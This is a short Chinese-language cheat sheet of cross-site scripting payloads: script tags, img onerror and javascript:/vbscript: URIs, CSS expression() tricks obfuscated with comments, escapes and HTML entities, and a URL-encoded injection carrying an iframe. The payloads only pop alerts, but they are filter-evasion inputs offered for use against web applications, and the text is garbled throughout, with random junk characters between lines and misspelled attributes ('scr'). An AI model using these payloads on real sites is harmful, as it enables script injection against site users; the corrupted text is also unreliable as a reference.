<script>alert("跨站")</script> (最常用): [& L2 c4 s) H: @* h
<img scr=javascript:alert("跨站")></img>
) U0 |( Q, ^$ w+ _<img scr="javascript: alert(/跨站/)></img>
3 O8 [' S5 J" v& V3 Y/ F<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
9 A8 L$ s0 y4 i5 f5 S5 a" y$ X<img scr="#" onerror=alert(/跨站/)></img>/ k, } H, ^5 c1 H$ s
<img scr="#" style="xss:expression(alert(/xss/));"></img>
+ L e) | C& k8 D1 ` u& h( M2 Z<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
/ P0 V7 a% G$ _2 X6 L. l4 X<img src=vbscript:msgbox ("xss")></img>8 O) u' D, N# }) P: q
<style> input {left:expression (alert('xss'))}</style>7 w3 \+ [) O7 q4 @" d! G
<div style={left:expression (alert('xss'))}></div>0 _! l9 ^* Y3 V& _1 `
<div style={left:exp/* */ression (alert('xss'))}></div> g6 b, f2 z$ s" ] e5 C% a
<div style={left:\0065\0078ression (alert('xss'))}></div>/ v- [! U' A. r- J3 p5 C7 e, C
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
3 `. E) b" {1 _* U( {; H4 municode <div style="{left:expRessioN (alert('xss'))}">( H/ a& E+ C z" e' ?
+ R3 ^% a7 h* a+ x
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["% X2 k5 g6 O9 V8 k
|